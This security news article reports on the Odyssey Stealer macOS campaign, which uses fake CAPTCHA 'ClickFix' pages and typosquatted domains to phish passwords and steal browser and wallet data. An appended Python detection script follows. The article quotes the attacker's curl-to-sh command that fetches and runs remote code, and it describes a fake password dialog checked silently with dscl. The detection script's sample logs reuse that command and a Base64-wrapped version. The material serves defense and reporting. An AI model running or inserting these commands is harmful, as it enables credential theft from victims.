Threat Actors Employ Clickfix Tactics to Deliver Malicious AppleScripts That Steal Login Credentials


A sophisticated new malware campaign targeting macOS users has emerged, employing deceptive “Clickfix” tactics to distribute malicious AppleScripts designed to harvest sensitive user credentials and financial data.

The campaign leverages typosquatted domains that closely mimic legitimate finance platforms and Apple App Store websites, creating a convincing facade that tricks users into executing dangerous commands on their systems.

The attack begins when users inadvertently visit malicious domains that present fake Cloudflare-style CAPTCHA prompts.


These verification pages instruct macOS users to copy a Base64-encoded command and paste it into Terminal, supposedly to prove they are not robots. The page never checks anything; the "verification" is just a pretext to get the victim to run attacker-controlled shell commands under their own account.

Once executed, the command kicks off a data-theft routine that targets browser credentials, cryptocurrency wallets, and other sensitive data stored by multiple applications.

Cyfirma researchers identified this malware as the Odyssey Stealer, a rebranded version of the previously known Poseidon Stealer that itself originated as a fork of the AMOS Stealer.

The research team uncovered multiple command-and-control panels linked to this activity, with infrastructure primarily hosted in Russia.

The malware demonstrates a clear preference for targeting users in Western countries, particularly the United States and European Union, while conspicuously avoiding victims in Commonwealth of Independent States nations.

The Odyssey Stealer represents a concerning evolution in macOS-targeting malware, combining social engineering tactics with sophisticated technical capabilities.

The campaign exploits no software vulnerability. It relies on the victim doing the work: a familiar-looking "security" prompt that resembles a routine verification step persuades the user to run the attacker's command themselves, so Gatekeeper and notarization never get a file to inspect.

The distribution sites are built to mirror trusted platforms closely, which makes the lure hard for an unsuspecting user to distinguish from the real thing.

Infection Mechanism and Payload Execution

The malware’s infection mechanism relies on a multi-stage process that begins with domain typosquatting and culminates in comprehensive system compromise.

ClickFix distribution flow (Source – Cyfirma)

When users visit the malicious domains, they encounter professionally designed pages that replicate the appearance of legitimate CAPTCHA verification systems.

The fake prompt shows macOS users a command to paste into Terminal, of the following form:-

curl -s http://odyssey1.to:3333/d?u=October | sh

This command fetches a script from the attacker's command-and-control server and pipes it straight into sh, so nothing is written to disk with a quarantine attribute and no Gatekeeper check is triggered. The retrieved payload is an AppleScript whose function names are obfuscated with alphanumeric strings, though analysis reveals its true purpose.

Upon execution, the malware creates a staging directory with mkdir, using /tmp/lovemrtrump as its working location for collected data.

The AppleScript then displays a convincing system-style authentication dialog designed to capture the user's account password.

To check the captured password without alerting the user, it runs the macOS dscl command with the -authonly option (dscl . -authonly <user> <password>), which authenticates against the local directory node and returns success or failure without showing any system dialog.

This lets the malware confirm that the password is valid before relying on it, without producing an authentication prompt from the OS or an obvious failure that might raise suspicion. The check is not invisible to defenders, however: the dscl invocation, the osascript dialog and the curl-to-sh pipeline are all ordinary process executions that endpoint telemetry can record.
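The chain described above (curl piped to sh, an optional Base64-wrapped stage, the hidden-answer AppleScript dialog, the dscl -authonly check and the /tmp staging directory) consists of process executions that a defender can match on. The following is an added detection example, not code from Cyfirma or from the article: it triages a constructed set of process-execution records (one JSON object per line with "pid", "parent" and "cmd" fields, an assumed export format) against those indicators, and decodes any "echo <base64> | base64 -d" stage so the inner command is matched as well. The sample records, the rule names and the field names are all assumptions made for the example.

```python
"""Heuristic triage of macOS process-execution records for ClickFix-style
stealer activity. Added example; the record format and rule names are
assumptions, not anything the article or Cyfirma published."""
import base64
import binascii
import json
import re

# Indicators taken from the article's description of the chain. The first two
# catch the generic ClickFix "paste this into Terminal" pattern; the rest catch
# the fake password dialog, the silent credential check and the staging dir.
RULES = [
    ("clickfix_curl_pipe_sh", re.compile(r"\bcurl\b[^|]*\|\s*(ba|z)?sh\b")),
    ("base64_decode_pipe_sh", re.compile(r"base64\s+(-d|--decode)[^|]*\|\s*(ba|z)?sh\b")),
    ("applescript_hidden_answer", re.compile(r"display dialog.*with hidden answer", re.I)),
    ("dscl_authonly", re.compile(r"\bdscl\b.*\s-authonly\b")),
    ("staging_dir_tmp", re.compile(r"/tmp/lovemrtrump\b")),
]

# "echo <base64> | base64 -d" stage: capture the blob so it can be decoded.
B64_ECHO = re.compile(
    r"echo\s+['\"]?([A-Za-z0-9+/=]{16,})['\"]?\s*\|\s*base64\s+(?:-d|--decode)"
)


def decode_embedded_base64(cmd):
    """Return the decoded text of an 'echo <b64> | base64 -d' stage, or None."""
    m = B64_ECHO.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def match_rules(cmd):
    """Rule names tripped by a command line, including by its decoded stage."""
    hits = [name for name, rx in RULES if rx.search(cmd)]
    inner = decode_embedded_base64(cmd)
    if inner:
        hits += ["decoded:" + name for name, rx in RULES if rx.search(inner)]
    return hits


def triage(lines):
    """Return (pid, cmd, hits) for every record that trips at least one rule."""
    findings = []
    for line in lines:
        rec = json.loads(line)
        hits = match_rules(rec["cmd"])
        if hits:
            findings.append((rec["pid"], rec["cmd"], hits))
    return findings


# Constructed sample telemetry. The lure command is the one quoted in the
# article; the Base64 variant is built here so the example is self-consistent.
_LURE = "curl -s http://odyssey1.to:3333/d?u=October | sh"
_LURE_B64 = base64.b64encode(_LURE.encode()).decode()
SAMPLE_LOG = [
    json.dumps({"pid": 4101, "parent": "Terminal", "cmd": _LURE}),
    json.dumps({"pid": 4102, "parent": "Terminal", "cmd": "echo %s | base64 -d | sh" % _LURE_B64}),
    json.dumps({"pid": 4103, "parent": "sh", "cmd": "mkdir -p /tmp/lovemrtrump"}),
    json.dumps({"pid": 4104, "parent": "sh", "cmd": "osascript -e 'display dialog "
               "\"macOS needs to update settings. Enter your password:\" "
               "default answer \"\" with hidden answer'"}),
    json.dumps({"pid": 4105, "parent": "sh", "cmd": "dscl . -authonly jdoe hunter2"}),
    # Benign activity that should not fire: a plain download and a file decode.
    json.dumps({"pid": 4106, "parent": "Terminal", "cmd": "curl -sO https://example.com/file.tar.gz"}),
    json.dumps({"pid": 4107, "parent": "Terminal", "cmd": "base64 -d encoded.txt > decoded.bin"}),
]

if __name__ == "__main__":
    for pid, cmd, hits in triage(SAMPLE_LOG):
        print(pid, hits, cmd[:60])
```

The Base64 stage is decoded and re-matched because the pasted lure often hides the real curl command inside an echo | base64 -d wrapper, so matching only on the outer command line would miss it. In production these rules belong in whatever consumes your endpoint telemetry; the dscl -authonly rule in particular is a high-signal indicator, since interactive users almost never type it.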
